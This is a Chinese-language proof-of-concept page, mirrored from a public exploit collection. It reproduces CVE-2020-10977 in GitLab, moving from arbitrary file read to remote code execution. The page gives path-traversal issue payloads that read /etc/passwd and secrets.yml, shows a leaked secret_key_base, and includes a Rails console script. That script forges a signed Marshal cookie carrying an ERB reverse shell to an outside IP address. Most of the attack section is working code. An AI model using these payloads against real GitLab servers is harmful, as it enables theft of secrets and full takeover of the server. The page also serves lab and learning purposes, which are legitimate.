admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/GitLab 任意文件读取导致RCE CVE-2020-10977.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

137 lines
4.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GitLab 任意文件读取导致RCE CVE-2020-10977
## 漏洞描述
GitLab 是一个用于仓库管理系统的开源项目使用Git作为代码管理工具并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发使用MIT许可证的基于网络的Git仓库管理工具且具有wiki和issue跟踪功能。
参考链接:
- [Hackone-Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052)
- [CVE-2020-10977-Gitlab CE/EE 任意文件读取导致远程命令执行漏洞](https://juejin.cn/post/6916343939649765389)
## 漏洞影响
```
GitLab GitLab EE >=8.5<=12.9
GitLab GitLab CE >=8.5<=12.9
```
## 漏洞复现
### 环境安装
```
yum -y install policycoreutils openssh-server openssh-clients postfix
```
分配给虚拟机的物理内存最好是4G。
下载gitlab安装包
- CE下载地址https://packages.gitlab.com/gitlab/gitlab-ce
- EE下载地址https://packages.gitlab.com/gitlab/gitlab-ee
安装
```
yum -y install ./gitlab......12_8.1.rpm
```
修改监听端口
```
vim /etc/gitlab/gitlab.rb
external_url 'http://localhost:8888'
```
重置和重启
```
gitlab-ctl reconfigure
gitlab-ctl restart
```
第一次进入会提示重置root密码
### 任意文件读取漏洞复现
创建两个项目test1 和 test2
![20210309-08:24:52-_By9fIt_O36viF](images/20210309-082452-_By9fIt_O36viF.png)
![20210309-08:26:10-_T98qwn_mogzsu](images/20210309-082610-_T98qwn_mogzsu.png)
在test1中新建一个issue。
内容为:
```
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
```
![20210309-08:27:10-_HGh3yK_MV8ygY](images/20210309-082710-_HGh3yK_MV8ygY.png)
创建好后将这个issue移动到test2。
![20210309-08:27:38-_Be3jaU_f9Ff6H](images/20210309-082738-_Be3jaU_f9Ff6H.png)
如果漏洞存在,并且文件有可读权限,就会变成一个链接。因为/etc/passwd被复制到了 `/var/opt/gitlab/gitlab-rails/uploads/@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/ed7e8cddbc49e3746e0b9974b5393d79/passwd`
![20210309-08:28:08-_lHi6lY_aM20WQ](images/20210309-082808-_lHi6lY_aM20WQ.png)
![20210309-08:47:53-_ZpR5vy_FDXJZL](images/20210309-084753-_ZpR5vy_FDXJZL.png)
### RCE漏洞复现
根据报告[Hackone-Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052)内容需要修改cookie并且读取目标机器上的secret.yaml并在本地搭建一个gitlab将本地的gitlab环境的secret.yaml替换为目标机器上的secret.yaml然后用gitlab的工具来生成cookie最后携带这段cookie直接请求目标gitlab环境即可。
这里我受害机环境使用的是HackTheBox靶机[Laboratory](https://www.hackthebox.eu/home/machines/profile/298)
步骤1 利用LFI漏洞先读取secrets.yaml来获取secret_key_base字段。
```
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
```
![20210309-08:54:20-_VKsHlY_bljjkV](images/20210309-085420-_VKsHlY_bljjkV.png)
![20210309-08:56:00-_JQy17p_AgTtwS](images/20210309-085600-_JQy17p_AgTtwS.png)
需要将本地的gitlab的secrets.yaml的secret_key_base字段替换为受害机的。
```
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
```
![20210309-09:06:32-_ZQ8xH0_8WVpIV](images/20210309-090632-_ZQ8xH0_8WVpIV.png)
进入rails console
```
gitlab-rails console
```
使用gitlab-rails console执行以下命令在获取到cookie之前这些命令会在本机执行一次所以在拿到cookie之后再监听端口。
```
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.248.245.171/9999 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
```
![20210309-09:19:19-_83wzq5_JvfiZX](images/20210309-091919-_83wzq5_JvfiZX.png)
![20210309-09:19:48-_F09ZMj_JR4sM5](images/20210309-091948-_F09ZMj_JR4sM5.png)
Reference in New Issue View Git Blame Copy Permalink